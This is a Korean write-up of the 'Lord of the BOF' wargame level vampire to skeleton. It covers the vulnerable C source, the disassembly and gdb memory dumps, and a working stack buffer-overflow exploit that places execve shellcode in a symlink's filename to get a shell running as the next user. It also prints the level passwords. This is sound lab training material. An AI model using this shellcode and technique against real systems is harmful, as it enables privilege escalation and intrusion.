[lob] vampire -> skeleton

728x90

1. intro

2. code 및 분석

2.1 C code

/*
        The Lord of the BOF : The Fellowship of the BOF
        - skeleton
        - argv hunter
*/

#include <stdio.h>
#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])
{
	char buffer[40];
	int i, saved_argc;

	if(argc < 2){
		printf("argv error\n");
		exit(0);
	}

	// egghunter 
	for(i=0; environ[i]; i++)
		memset(environ[i], 0, strlen(environ[i]));

	if(argv[1][47] != '\xbf')
	{
		printf("stack is still your friend.\n");
		exit(0);
	}

	// check the length of argument
	if(strlen(argv[1]) > 48){
		printf("argument is too long!\n");
		exit(0);
	}

	// argc saver
	saved_argc = argc;

	strcpy(buffer, argv[1]); 
	printf("%s\n", buffer);

        // buffer hunter
        memset(buffer, 0, 40);

	// ultra argv hunter!
	for(i=0; i<saved_argc; i++)
		memset(argv[i], 0, strlen(argv[i]));
}

2.3. 분석

2.3.1. assembler code (중요 부분)

앞과 동일하지만, 추가된 부분은 아래와 같디 argv 모두를 초기화 한다는 점이다.

0x8048623 <main+291>:	mov    0xffffffd4(%ebp),%eax
0x8048626 <main+294>:	cmp    0xffffffd0(%ebp),%eax
0x8048629 <main+297>:	jl     0x8048630 <main+304>
0x804862b <main+299>:	jmp    0x8048670 <main+368>
0x804862d <main+301>:	lea    0x0(%esi),%esi
0x8048630 <main+304>:	mov    0xffffffd4(%ebp),%eax
0x8048633 <main+307>:	lea    0x0(,%eax,4),%edx
0x804863a <main+314>:	mov    0xc(%ebp),%eax
0x804863d <main+317>:	mov    (%eax,%edx,1),%edx
0x8048640 <main+320>:	push   %edx
0x8048641 <main+321>:	call   0x80483f0 <strlen>
0x8048646 <main+326>:	add    $0x4,%esp
0x8048649 <main+329>:	mov    %eax,%eax
0x804864b <main+331>:	push   %eax
0x804864c <main+332>:	push   $0x0
0x804864e <main+334>:	mov    0xffffffd4(%ebp),%eax
0x8048651 <main+337>:	lea    0x0(,%eax,4),%edx
0x8048658 <main+344>:	mov    0xc(%ebp),%eax
0x804865b <main+347>:	mov    (%eax,%edx,1),%edx
0x804865e <main+350>:	push   %edx
0x804865f <main+351>:	call   0x8048430 <memset>
0x8048664 <main+356>:	add    $0xc,%esp
0x8048667 <main+359>:	incl   0xffffffd4(%ebp)
0x804866a <main+362>:	jmp    0x8048623 <main+291>
0x804866c <main+364>:	lea    0x0(%esi,1),%esi

3. 취약점 확인 및 공격 준비

3.1 취약점

취약점은 동일하다.

3.2 공격 준비

환경변수 영역 및 stack 모두 초기화해버리기에 더 이상 값을 쓸 곳이 없어 보이지만,

가장 마지막 부분으로 가보면 어떤 값이 들어있다.

0xbfffffb8:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffffc8:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffffd8:	0x00000000	0x00000000	0x00000000	0x6f682f00
0xbfffffe8:	0x762f656d	0x69706d61	0x732f6572	0x656c656b
0xbffffff8:	0x00616f74	0x00000000	Cannot access memory at address 0xc0000000

이를 출력해보면 파일명 임을 알 수 있다.

그럼 심볼릭 링크를 통해 변경된 파일명이 삽입되는지 확인해보자.

[vampire@localhost vampire]$ ln -s skeletoa `python -c 'print "A"*100'`
[vampire@localhost vampire]$ ls
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  skeleton
skeletoa                                                                                              skeleton.c
[vampire@localhost vampire]$ gdb AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
(gdb) b *main+368
(gdb) r `python -c 'print "A"*44 + "\xbf\xbf\xbf\xbf"'`
Starting program: /home/vampire/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA `python -c 'print "A"*44 + "\xbf\xbf\xbf\xbf"'`
/bin/bash2: /home/troll/.bashrc: Permission denied
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¿¿¿¿
Breakpoint 1, 0x8048670 in main ()
(gdb) x/40x 0xbfffff00
0xbfffff00:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffff10:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffff20:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffff30:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffff40:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffff50:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffff60:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffff70:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffff80:	0x00000000	0x00000000	0x6f682f00	0x762f656d
0xbfffff90:	0x69706d61	0x412f6572	0x41414141	0x41414141
(gdb) 
0xbfffffa0:	0x41414141	0x41414141	0x41414141	0x41414141
0xbfffffb0:	0x41414141	0x41414141	0x41414141	0x41414141
0xbfffffc0:	0x41414141	0x41414141	0x41414141	0x41414141
0xbfffffd0:	0x41414141	0x41414141	0x41414141	0x41414141
0xbfffffe0:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffff0:	0x41414141	0x41414141	0x00414141	0x00000000
0xc0000000:	Cannot access memory at address 0xc0000000

4. exploit

위를 토대로 파일 명을 셀코드로 사용하여 공격해보면 아래와 같다.

[vampire@localhost vampire]$ ln -s skeletoa `python -c 'print "A"*100 + "\x31\xc0\x50\xb8\x2e\x2e\x73\x68\x66\x05\x01\x01\x50\xb8\x2e\x62\x69\x6e\x04\x01\x50\x89\xe3\x31\xc0\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"'`
[vampire@localhost vampire]$ ls   
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1󿿐¸..shf???P¸.bin??P?ᲀP?ᑿᮿ˿
skeletoa
skeleton
skeleton.c
[vampire@localhost vampire]$ ./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1󿿐¸..shf^E^A^AP¸.bin^D^APᲀPᓉᯞK̀ `python -c 'print "A"*44 + "\xa0\xff\xff\xbf"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ÿÿ¿
bash$ id
uid=509(vampire) gid=509(vampire) groups=509(vampire)
bash$ my-pass
euid = 509
music world
bash$ exit
exit
[vampire@localhost vampire]$ rm AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1󿿐¸..shf^E^A^AP¸.bin^D^APᲀPᓉᯞK̀ 
[vampire@localhost vampire]$ ln -s skeleton `python -c 'print "A"*100 + "\x31\xc0\x50\xb8\x2e\x2e\x73\x68\x66\x05\x01\x01\x50\xb8\x2e\x62\x69\x6e\x04\x01\x50\x89\xe3\x31\xc0\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"'`
[vampire@localhost vampire]$ ./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1󿿐¸..shf^E^A^AP¸.bin^D^APᲀPᓉᯞK̀ `python -c 'print "A"*44 + "\xa0\xff\xff\xbf"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ÿÿ¿
bash$ id
uid=509(vampire) gid=509(vampire) euid=510(skeleton) egid=510(skeleton) groups=509(vampire)
bash$ my-pass
euid = 510
shellcoder